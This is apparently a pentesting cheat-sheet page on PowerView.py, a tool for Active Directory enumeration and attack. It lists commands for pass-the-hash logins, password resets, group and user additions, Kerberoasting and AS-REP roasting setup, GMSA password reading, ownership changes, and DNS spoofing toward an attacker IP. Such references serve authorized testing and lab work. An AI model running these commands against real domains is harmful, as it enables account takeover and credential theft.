🧠PowerView.py

Introduction

PowerView.py is an alternative to the fantastic original PowerView.ps1 script. Most of the modules used in PowerView are available here (some of the flags have changed). The main goal is to achieve an interactive session without having to repeatedly authenticate to LDAP.

GitHub Repository: aniqfakhrul/powerview.py - Just another Powerview alternative

Installation

Before installing PowerView.py, you need to install the required system dependencies:

sudo apt install libkrb5-dev

Then install PowerView using pip:

pip3 install powerview --break-system-packages

Usage

PowerView.py supports multiple authentication methods for connecting to Active Directory environments.

Basic Authentication (Username/Password)

powerview domain.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10

Pass-the-Hash (PtH) Authentication

powerview domain.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10

Kerberos Authentication

powerview domain.htb/user@dc.domain.htb --dc-ip 10.10.10.10 -ns dc.domain.htb -k --no-pass

Web Browser Interface

PowerView.py also provides a web interface for easier interaction:

powerview domain.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000

Attacking Active Directory with PowerView.py

PowerView.py provides various commands for Active Directory enumeration and exploitation. Below are some common attack scenarios and their corresponding commands.

User and Group Management

Add User to Group

Add a user to a specific domain group:

Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'

Modify User Password

Change a user's password (requires appropriate permissions):

Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Add New Domain User

Create a new user in the domain:

Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'

Kerberoasting Attacks

Set ServicePrincipalName for Kerberoasting

Assign a ServicePrincipalName (SPN) to a user for Kerberoasting attacks. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

Execute Kerberoasting Attack

Perform Kerberoasting to extract service tickets:

Invoke-Kerberoast

ASREPRoasting Attacks

Enable DONT_REQ_PREAUTH for ASREPRoast

Configure a user account to not require Kerberos pre-authentication. This requires GenericAll/GenericWrite permissions on the target user:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

Account Management

Enable Disabled User Account

Remove the ACCOUNTDISABLE flag to enable a disabled user account:

Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'

GMSA (Group Managed Service Accounts)

Read GMSA Password

Extract Group Managed Service Account passwords:

Get-GMSA

Object Ownership and Permissions

Change Object Owner

Make a user the owner of a specific object:

Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

Computer Management

Add New Domain Computer

Create a new computer account in the domain:

Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'

DNS Manipulation

Create DNS Record for Spoofing

Add a new DNS record for DNS spoofing attacks:

Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>

Security Considerations

When using PowerView.py for penetration testing or security assessments:

Always ensure you have proper authorization before testing
Use these tools only in authorized environments
Document all activities for reporting purposes
Follow responsible disclosure practices
Be aware of the potential impact of your actions on production systems

Troubleshooting

If you encounter issues during installation or usage:

Ensure all dependencies are properly installed
Verify network connectivity to the target domain controller
Check authentication credentials and permissions
Review error messages for specific guidance
Consult the GitHub repository for updates and known issues

Resources

Official Repository: GitHub - aniqfakhrul/powerview.py
Original PowerView: PowerSploit PowerView
Active Directory Security: Microsoft Active Directory Security Documentation

PreviousLDAPSearch NextLinux Privilege Escalation

Last updated 8 months ago

hashtagIntroduction

hashtagInstallation

hashtagUsage

hashtagBasic Authentication (Username/Password)

hashtagPass-the-Hash (PtH) Authentication

hashtagKerberos Authentication

hashtagWeb Browser Interface

hashtagAttacking Active Directory with PowerView.py

hashtagUser and Group Management

hashtagAdd User to Group

hashtagModify User Password

hashtagAdd New Domain User

hashtagKerberoasting Attacks

hashtagSet ServicePrincipalName for Kerberoasting

hashtagExecute Kerberoasting Attack

hashtagASREPRoasting Attacks

hashtagEnable DONT_REQ_PREAUTH for ASREPRoast

hashtagAccount Management

hashtagEnable Disabled User Account

hashtagGMSA (Group Managed Service Accounts)

hashtagRead GMSA Password

hashtagObject Ownership and Permissions

hashtagChange Object Owner

hashtagComputer Management

hashtagAdd New Domain Computer

hashtagDNS Manipulation

hashtagCreate DNS Record for Spoofing

hashtagSecurity Considerations

hashtagTroubleshooting

hashtagResources